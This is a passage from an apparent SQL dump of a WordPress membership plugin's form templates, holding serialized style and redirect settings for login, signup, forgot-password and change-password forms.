Password\";s:25:\"forgot_password_link_type\";s:5:\"modal\";s:30:\"forgot_password_link_type_page\";i:2045;s:27:\"forgot_password_link_margin\";a:4:{s:6:\"bottom\";s:1:\"0\";s:3:\"top\";s:4:\"-132\";s:4:\"left\";s:3:\"315\";s:5:\"right\";s:1:\"0\";}s:24:\"registration_link_margin\";a:4:{s:3:\"top\";i:0;s:6:\"bottom\";i:0;s:4:\"left\";i:0;s:5:\"right\";i:0;}s:5:\"style\";a:81:{s:19:\"social_btn_position\";s:6:\"bottom\";s:15:\"social_btn_type\";s:10:\"horizontal\";s:16:\"social_btn_align\";s:6:\"center\";s:27:\"enable_social_btn_separator\";s:1:\"1\";s:20:\"social_btn_separator\";s:19:\"<center>OR</center>\";s:11:\"form_layout\";s:6:\"writer\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:19:\"form_padding_bottom\";s:2:\"40\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:4:\"blue\";s:16:\"lable_font_color\";s:7:\"#1A2538\";s:16:\"field_font_color\";s:7:\"#2F3F5C\";s:18:\"field_border_color\";s:7:\"#D3DEF0\";s:17:\"field_focus_color\";s:7:\"#637799\";s:17:\"button_back_color\";s:7:\"#005AEE\";s:17:\"button_font_color\";s:7:\"#FFFFFF\";s:18:\"button_hover_color\";s:7:\"#0D54C9\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"form_title_font_color\";s:7:\"#1A2538\";s:13:\"form_bg_color\";s:7:\"#FFFFFF\";s:17:\"form_border_color\";s:7:\"#CED4DE\";s:19:\"prefix_suffix_color\";s:7:\"#bababa\";s:16:\"error_font_color\";s:7:\"#FF3B3B\";s:24:\"error_field_border_color\";s:7:\"#FF3B3B\";s:20:\"error_field_bg_color\";s:7:\"#ffffff\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:2:\"18\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"0\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"0\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"360\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"40\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:1:\"6\";s:12:\"button_style\";s:6:\"border\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"0\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:2:\"10\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:11:\"description\";s:50:\"Please enter your email address or username below.\";s:7:\"message\";s:35:\"Your password changed successfully.\";}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(5,'Template 2<hr style=\'border:2px solid #005aee;\'/>','Please Signup<hr style=\'border:2px solid #005aee;\'/>','template','template-registration-2',1,'Template 2',0,1,2,'a:8:{s:13:\"redirect_type\";s:4:\"page\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:10:\"auto_login\";s:1:\"1\";s:5:\"style\";a:78:{s:11:\"form_layout\";s:6:\"writer\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:19:\"form_padding_bottom\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:4:\"blue\";s:16:\"lable_font_color\";s:7:\"#1A2538\";s:16:\"field_font_color\";s:7:\"#2F3F5C\";s:18:\"field_border_color\";s:7:\"#D3DEF0\";s:17:\"field_focus_color\";s:7:\"#637799\";s:17:\"button_back_color\";s:7:\"#005AEE\";s:17:\"button_font_color\";s:7:\"#FFFFFF\";s:18:\"button_hover_color\";s:7:\"#0D54C9\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"login_link_font_color\";s:7:\"#005AEE\";s:24:\"register_link_font_color\";s:7:\"#005AEE\";s:21:\"form_title_font_color\";s:7:\"#1A2538\";s:13:\"form_bg_color\";s:7:\"#FFFFFF\";s:17:\"form_border_color\";s:7:\"#CED4DE\";s:19:\"prefix_suffix_color\";s:7:\"#bababa\";s:16:\"error_font_color\";s:7:\"#FF3B3B\";s:24:\"error_field_border_color\";s:7:\"#FF3B3B\";s:20:\"error_field_bg_color\";s:7:\"#ffffff\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:2:\"18\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"0\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"0\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"110\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:3:\"100\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:2:\"90\";s:12:\"button_style\";s:6:\"border\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"0\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:2:\"10\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:10:\"custom_css\";s:172:\".arm-df__heading{padding-bottom:40px !important;}.arm_forgot_password_description{margin-top: -30px !important;margin-bottom: 40px !important;margin-left: 20px !important;}\";s:27:\"registration_link_type_page\";i:2043;s:30:\"forgot_password_link_type_page\";i:2045;}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(6,'Please Login<hr style=\'border:2px solid #005aee;\' />','Please Login<hr style=\'border:2px solid #005aee;\' />','template','template-login-2',1,'Template 2',-2,1,2,'a:18:{s:17:\"display_direction\";s:8:\"vertical\";s:13:\"redirect_type\";s:4:\"page\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:15:\"show_rememberme\";s:1:\"1\";s:22:\"show_registration_link\";s:1:\"1\";s:23:\"registration_link_label\";s:44:\"Dont have account? [ARMLINK]SIGNUP[/ARMLINK]\";s:22:\"registration_link_type\";s:4:\"page\";s:28:\"registration_link_type_modal\";s:1:\"1\";s:27:\"registration_link_type_page\";i:2043;s:25:\"show_forgot_password_link\";s:1:\"1\";s:26:\"forgot_password_link_label\";s:15:\"Forgot Password\";s:25:\"forgot_password_link_type\";s:5:\"modal\";s:30:\"forgot_password_link_type_page\";i:2045;s:27:\"forgot_password_link_margin\";a:4:{s:6:\"bottom\";s:1:\"0\";s:3:\"top\";s:4:\"-198\";s:4:\"left\";s:3:\"320\";s:5:\"right\";s:1:\"0\";}s:24:\"registration_link_margin\";a:4:{s:3:\"top\";s:1:\"5\";s:6:\"bottom\";s:1:\"0\";s:4:\"left\";s:3:\"110\";s:5:\"right\";s:1:\"0\";}s:5:\"style\";a:78:{s:11:\"form_layout\";s:6:\"writer\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:19:\"form_padding_bottom\";s:2:\"40\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:4:\"blue\";s:16:\"lable_font_color\";s:7:\"#1A2538\";s:16:\"field_font_color\";s:7:\"#2F3F5C\";s:18:\"field_border_color\";s:7:\"#D3DEF0\";s:17:\"field_focus_color\";s:7:\"#637799\";s:17:\"button_back_color\";s:7:\"#005AEE\";s:17:\"button_font_color\";s:7:\"#FFFFFF\";s:18:\"button_hover_color\";s:7:\"#0D54C9\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"login_link_font_color\";s:7:\"#005AEE\";s:24:\"register_link_font_color\";s:7:\"#005AEE\";s:21:\"form_title_font_color\";s:7:\"#1A2538\";s:13:\"form_bg_color\";s:7:\"#FFFFFF\";s:17:\"form_border_color\";s:7:\"#CED4DE\";s:19:\"prefix_suffix_color\";s:7:\"#bababa\";s:16:\"error_font_color\";s:7:\"#FF3B3B\";s:24:\"error_field_border_color\";s:7:\"#FF3B3B\";s:20:\"error_field_bg_color\";s:7:\"#ffffff\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:2:\"18\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"0\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"0\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"110\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:3:\"110\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:2:\"90\";s:12:\"button_style\";s:6:\"border\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"0\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:1:\"5\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:10:\"custom_css\";s:172:\".arm-df__heading{padding-bottom:40px !important;}.arm_forgot_password_description{margin-top: -30px !important;margin-bottom: 40px !important;margin-left: 20px !important;}\";}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(7,'Forgot Password<hr style=\'border:2px solid #005aee;\' />','Forgot Password<hr style=\'border:2px solid #005aee;\' />','template','template-forgot-password-2',1,'Template 2',-2,1,2,'a:19:{s:17:\"display_direction\";s:8:\"vertical\";s:13:\"redirect_type\";s:7:\"message\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:15:\"show_rememberme\";s:1:\"1\";s:22:\"show_registration_link\";s:1:\"1\";s:23:\"registration_link_label\";s:44:\"Dont have account? [ARMLINK]SIGNUP[/ARMLINK]\";s:22:\"registration_link_type\";s:4:\"page\";s:28:\"registration_link_type_modal\";s:1:\"1\";s:27:\"registration_link_type_page\";i:2043;s:25:\"show_forgot_password_link\";s:1:\"1\";s:26:\"forgot_password_link_label\";s:15:\"Forgot Password\";s:25:\"forgot_password_link_type\";s:5:\"modal\";s:30:\"forgot_password_link_type_page\";i:2045;s:27:\"forgot_password_link_margin\";a:4:{s:6:\"bottom\";s:1:\"0\";s:3:\"top\";s:4:\"-198\";s:4:\"left\";s:3:\"320\";s:5:\"right\";s:1:\"0\";}s:24:\"registration_link_margin\";a:4:{s:3:\"top\";s:1:\"5\";s:6:\"bottom\";s:1:\"0\";s:4:\"left\";s:3:\"110\";s:5:\"right\";s:1:\"0\";}s:5:\"style\";a:78:{s:11:\"form_layout\";s:6:\"writer\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:19:\"form_padding_bottom\";s:2:\"40\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:4:\"blue\";s:16:\"lable_font_color\";s:7:\"#1A2538\";s:16:\"field_font_color\";s:7:\"#2F3F5C\";s:18:\"field_border_color\";s:7:\"#D3DEF0\";s:17:\"field_focus_color\";s:7:\"#637799\";s:17:\"button_back_color\";s:7:\"#005AEE\";s:17:\"button_font_color\";s:7:\"#FFFFFF\";s:18:\"button_hover_color\";s:7:\"#0D54C9\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"login_link_font_color\";s:7:\"#005AEE\";s:24:\"register_link_font_color\";s:7:\"#005AEE\";s:21:\"form_title_font_color\";s:7:\"#1A2538\";s:13:\"form_bg_color\";s:7:\"#FFFFFF\";s:17:\"form_border_color\";s:7:\"#CED4DE\";s:19:\"prefix_suffix_color\";s:7:\"#bababa\";s:16:\"error_font_color\";s:7:\"#FF3B3B\";s:24:\"error_field_border_color\";s:7:\"#FF3B3B\";s:20:\"error_field_bg_color\";s:7:\"#ffffff\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:2:\"18\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"0\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"0\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"110\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:3:\"110\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:2:\"90\";s:12:\"button_style\";s:6:\"border\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"0\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:1:\"5\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:10:\"custom_css\";s:172:\".arm-df__heading{padding-bottom:40px !important;}.arm_forgot_password_description{margin-top: -30px !important;margin-bottom: 40px !important;margin-left: 20px !important;}\";s:11:\"description\";s:50:\"Please enter your email address or username below.\";}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(8,'Change Password<hr style=\'border:2px solid #005aee;\' />','Change Password<hr style=\'border:2px solid #005aee;\' />','template','template-change-password-2',1,'Template 2',-2,1,2,'a:20:{s:17:\"display_direction\";s:8:\"vertical\";s:13:\"redirect_type\";s:7:\"message\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:15:\"show_rememberme\";s:1:\"1\";s:22:\"show_registration_link\";s:1:\"1\";s:23:\"registration_link_label\";s:44:\"Dont have account? [ARMLINK]SIGNUP[/ARMLINK]\";s:22:\"registration_link_type\";s:4:\"page\";s:28:\"registration_link_type_modal\";s:1:\"1\";s:27:\"registration_link_type_page\";i:2043;s:25:\"show_forgot_password_link\";s:1:\"1\";s:26:\"forgot_password_link_label\";s:15:\"Forgot Password\";s:25:\"forgot_password_link_type\";s:5:\"modal\";s:30:\"forgot_password_link_type_page\";i:2045;s:27:\"forgot_password_link_margin\";a:4:{s:6:\"bottom\";s:1:\"0\";s:3:\"top\";s:4:\"-198\";s:4:\"left\";s:3:\"320\";s:5:\"right\";s:1:\"0\";}s:24:\"registration_link_margin\";a:4:{s:3:\"top\";s:1:\"5\";s:6:\"bottom\";s:1:\"0\";s:4:\"left\";s:3:\"110\";s:5:\"right\";s:1:\"0\";}s:5:\"style\";a:78:{s:11:\"form_layout\";s:6:\"writer\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:19:\"form_padding_bottom\";s:2:\"40\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:4:\"blue\";s:16:\"lable_font_color\";s:7:\"#1A2538\";s:16:\"field_font_color\";s:7:\"#2F3F5C\";s:18:\"field_border_color\";s:7:\"#D3DEF0\";s:17:\"field_focus_color\";s:7:\"#637799\";s:17:\"button_back_color\";s:7:\"#005AEE\";s:17:\"button_font_color\";s:7:\"#FFFFFF\";s:18:\"button_hover_color\";s:7:\"#0D54C9\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:21:\"login_link_font_color\";s:7:\"#005AEE\";s:24:\"register_link_font_color\";s:7:\"#005AEE\";s:21:\"form_title_font_color\";s:7:\"#1A2538\";s:13:\"form_bg_color\";s:7:\"#FFFFFF\";s:17:\"form_border_color\";s:7:\"#CED4DE\";s:19:\"prefix_suffix_color\";s:7:\"#bababa\";s:16:\"error_font_color\";s:7:\"#FF3B3B\";s:24:\"error_field_border_color\";s:7:\"#FF3B3B\";s:20:\"error_field_bg_color\";s:7:\"#ffffff\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:2:\"18\";s:18:\"field_border_width\";s:1:\"1\";s:19:\"field_border_radius\";s:1:\"0\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"0\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"110\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:3:\"110\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:2:\"90\";s:12:\"button_style\";s:6:\"border\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"0\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:1:\"5\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:10:\"custom_css\";s:172:\".arm-df__heading{padding-bottom:40px !important;}.arm_forgot_password_description{margin-top: -30px !important;margin-bottom: 40px !important;margin-left: 20px !important;}\";s:11:\"description\";s:50:\"Please enter your email address or username below.\";s:7:\"message\";s:35:\"Your password changed successfully.\";}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(9,'Template 3','Please Signup','template','template-registration-3',1,'Template 3',0,1,3,'a:8:{s:13:\"redirect_type\";s:4:\"page\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:10:\"auto_login\";s:1:\"1\";s:5:\"style\";a:80:{s:11:\"form_layout\";s:7:\"rounded\";s:10:\"form_width\";s:3:\"550\";s:15:\"form_width_type\";s:2:\"px\";s:17:\"form_border_width\";s:1:\"2\";s:18:\"form_border_radius\";s:2:\"12\";s:17:\"form_border_style\";s:5:\"solid\";s:17:\"form_padding_left\";s:2:\"30\";s:16:\"form_padding_top\";s:2:\"40\";s:19:\"form_padding_bottom\";s:2:\"40\";s:18:\"form_padding_right\";s:2:\"30\";s:13:\"form_position\";s:4:\"left\";s:7:\"form_bg\";s:0:\"\";s:22:\"form_title_font_family\";s:7:\"Poppins\";s:20:\"form_title_font_size\";s:2:\"24\";s:20:\"form_title_font_bold\";s:1:\"1\";s:22:\"form_title_font_italic\";s:1:\"0\";s:26:\"form_title_font_decoration\";s:0:\"\";s:19:\"form_title_position\";s:6:\"center\";s:19:\"validation_position\";s:6:\"bottom\";s:12:\"color_scheme\";s:3:\"red\";s:16:\"lable_font_color\";s:7:\"#1a2538\";s:16:\"field_font_color\";s:7:\"#242424\";s:18:\"field_border_color\";s:7:\"#dbdbdb\";s:17:\"field_focus_color\";s:7:\"#a38ea3\";s:17:\"button_back_color\";s:7:\"#dd2476\";s:26:\"button_back_color_gradient\";s:7:\"#ff512f\";s:17:\"button_font_color\";s:7:\"#ffffff\";s:18:\"button_hover_color\";s:7:\"#dd2476\";s:23:\"button_hover_font_color\";s:7:\"#ffffff\";s:27:\"button_hover_color_gradient\";s:7:\"#ff512f\";s:21:\"login_link_font_color\";s:7:\"#e65e80\";s:24:\"register_link_font_color\";s:7:\"#e65e80\";s:21:\"form_title_font_color\";s:7:\"#dd2476\";s:13:\"form_bg_color\";s:7:\"#ffffff\";s:17:\"form_border_color\";s:7:\"#e6e7f5\";s:19:\"prefix_suffix_color\";s:7:\"#997a88\";s:16:\"error_font_color\";s:7:\"#ffffff\";s:24:\"error_field_border_color\";s:7:\"#f05050\";s:20:\"error_field_bg_color\";s:7:\"#e6594d\";s:11:\"field_width\";s:3:\"100\";s:16:\"field_width_type\";s:1:\"%\";s:12:\"field_height\";s:2:\"44\";s:13:\"field_spacing\";s:1:\"8\";s:18:\"field_border_width\";s:1:\"2\";s:19:\"field_border_radius\";s:2:\"40\";s:18:\"field_border_style\";s:5:\"solid\";s:17:\"field_font_family\";s:7:\"Poppins\";s:15:\"field_font_size\";s:2:\"15\";s:15:\"field_font_bold\";s:1:\"0\";s:17:\"field_font_italic\";s:1:\"0\";s:21:\"field_font_decoration\";s:0:\"\";s:14:\"field_position\";s:4:\"left\";s:3:\"rtl\";s:1:\"0\";s:11:\"label_width\";s:3:\"250\";s:16:\"label_width_type\";s:2:\"px\";s:14:\"label_position\";s:5:\"block\";s:11:\"label_align\";s:4:\"left\";s:10:\"label_hide\";s:1:\"1\";s:17:\"label_font_family\";s:7:\"Poppins\";s:15:\"label_font_size\";s:2:\"14\";s:21:\"description_font_size\";s:2:\"14\";s:15:\"label_font_bold\";s:1:\"0\";s:17:\"label_font_italic\";s:1:\"0\";s:21:\"label_font_decoration\";s:0:\"\";s:12:\"button_width\";s:3:\"180\";s:17:\"button_width_type\";s:2:\"px\";s:13:\"button_height\";s:2:\"48\";s:18:\"button_height_type\";s:2:\"px\";s:20:\"button_border_radius\";s:2:\"50\";s:12:\"button_style\";s:4:\"flat\";s:18:\"button_font_family\";s:7:\"Poppins\";s:16:\"button_font_size\";s:2:\"15\";s:16:\"button_font_bold\";s:1:\"1\";s:18:\"button_font_italic\";s:1:\"0\";s:22:\"button_font_decoration\";s:0:\"\";s:18:\"button_margin_left\";s:1:\"0\";s:17:\"button_margin_top\";s:1:\"5\";s:19:\"button_margin_right\";s:1:\"0\";s:20:\"button_margin_bottom\";s:1:\"0\";s:15:\"button_position\";s:6:\"center\";}s:10:\"custom_css\";s:204:\".arm-df__form-field-wrap_rememberme{margin-top:-10px !important;margin-left:15px !important;}.arm-df__form-control-submit-btn:hover{border:0px; !important;}.arm-df__heading{margin-bottom:40px !important;}\";s:27:\"registration_link_type_page\";i:2043;s:30:\"forgot_password_link_type_page\";i:2045;}','2023-03-28 07:20:18','2023-03-28 07:20:18'),(10,'PLEASE LOGIN','PLEASE LOGIN','template','template-login-3',1,'Template 3',-3,1,3,'a:18:{s:17:\"display_direction\";s:8:\"vertical\";s:13:\"redirect_type\";s:4:\"page\";s:13:\"redirect_page\";i:2046;s:12:\"redirect_url\";s:0:\"\";s:15:\"show_rememberme\";s:1:\"1\";s:22:\"show_registration_link\";s:1:\"1\";s:23:\"registration_link_label\";s:14:\"CREATE ACCOUNT\";s:22:\"registration_link_type\";s:4:\"page\";s:28:\"registration_link_type_modal\";s:1:\"1\";s:27:\"registration_link_type_page\";i:2043;s:25:\"show_forgot_password_link\";s:1:\"1\";s:26:\"forgot_password_link_label\";s:15:\"Forgot 